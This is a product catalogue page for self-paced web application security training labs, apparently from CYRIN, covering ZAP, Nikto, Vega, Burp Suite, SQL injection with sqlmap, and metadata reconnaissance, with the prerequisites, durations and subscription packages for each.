Web-based applications are the most significant security exposure your organization faces.

Labs in this category focus on detecting and understanding vulnerabilities in your web-based applications—penetration testing for the web. These vulnerabilities can be the result of risky coding practices, configuration problems, or newly-discovered vulnerabilities in supporting software or frameworks. These labs utilize multiple tools to examine web application servers using a "black box" approach, without access to source code.

Questions about which lab is right for you? Contact info@cyrintraining.com.

Students will use the OWASP program’s ZAP tool suite from within Kali Linux to scan multiple web services and document vulnerabilities. Students will see ZAP in action on a vulnerable web site where entire database tables are available to potential attackers.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.), networking concepts (TCP/IP, DNS, etc.), and familiarity with the Unix/Linux command line.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Cost

Free trial available (30 days)!

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Introduction to Cybersecurity Lab Package
  • Secure Software Assessor
  • Cyber Defense Analyst 1
  • Cyber Operator 1
  • Vulnerability Assessment Analyst 1
  • Target Developer 1
  • Systems Security Analyst 1
  • Security Architect
  • Authorizing Official/Designating Representative
  • Intrusion Detection and Prevention Lab Package
Educational Lab

Students will use the Nikto tool to test web services over the network and document vulnerabilities. Students will then use network packet capture tools such as Wireshark to verify their understanding of the vulnerabilities and testing procedures.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.), networking concepts (TCP/IP, DNS, etc.), and familiarity with the Unix/Linux command line.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
  • Systems Security Analyst 2
  • Security Architect
Educational Lab

Students will use the Vega scanning tool, within a graphical Kali Linux environment, to test web services over the network and document vulnerabilities. Students will then use network packet capture tools such as Wireshark to verify their understanding of the vulnerabilities and testing procedures.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.) and networking concepts (TCP/IP, DNS, etc.).

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Secure Software Assessor
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 1
  • Target Developer 1
  • Systems Security Analyst 1
  • Authorizing Official/Designating Representative
Educational Lab

Burp Suite is an industry standard suite of tools used by information security professionals for testing Web application security. Its tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Students learn to use Burp tools to find security vulnerabilities in a web application. They will discover the application is vulnerable to cross-site scripting (XSS) attacks and will learn how to exploit the vulnerability to steal user credentials.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.).

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Secure Software Assessor
  • Cyber Defense Analyst 2
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
  • Systems Security Analyst 2
  • Security Architect
  • Authorizing Official/Designating Representative
Educational Lab

Students will learn how to detect and exploit SQL injection vulnerabilities. By using several SQL injections techniques students will gather information about a remote database such as server operating system, database type, table names, and most importantly, table content. Students will then use sqlmap, a tool for SQL injection, to automate this process.

Prerequisites

Basic knowledge of SQL database queries and familiarity with the Unix/Linux command line.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Secure Software Assessor
  • Cyber Defense Analyst 2
  • Cyber Operator 2
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
  • Systems Security Analyst 2
  • Security Architect
  • Authorizing Official/Designating Representative
Educational Lab

Web site reconnaissance is about gathering information about a web site. Of course, there is information published on the website that is intended for people to see. Then there is information such as the name and version of the software used in the website and information about databases used by web applications on the site. This is information the website owner may not want known but can be discovered using techniques covered by CYRIN labs in the Network Monitoring and Recon and Web Application Security Analysis categories.

In this lab students will learn to find additional information from documents on the website. These documents have associated with them document metadata, which is information attached to a file that isn't visible when the document is viewed. For example, metadata associated with a Microsoft Word document includes its creation time and the name of the person who created it. This is very likely information not intended to be publicly available.

Tools used in this lab include FOCA, wget and ExifTool.

Prerequisites

Basic web application knowledge (HTTP, URL parameters, etc.) and familiarity with the Windows command prompt.

Expected Duration

2 hours, self-paced. Pause and continue at any time.
2 CPEs awarded on successful completion.

Availability

Included if you are a subscriber to any of the following training packages:

  • Level 1: CYRIN Enterprise Instructional Labs
  • Level 2: Attack/Defense/IR Exercises and Instructional Labs
  • Level 3: Attack Scenarios, Attack/Defense/IR Exercises, and Instructional Labs
  • Web Application Security Analysis Package
  • Cyber Defense Analyst 2
  • Cyber Operator 1
  • Vulnerability Assessment Analyst 2
  • Target Developer 2
Educational Lab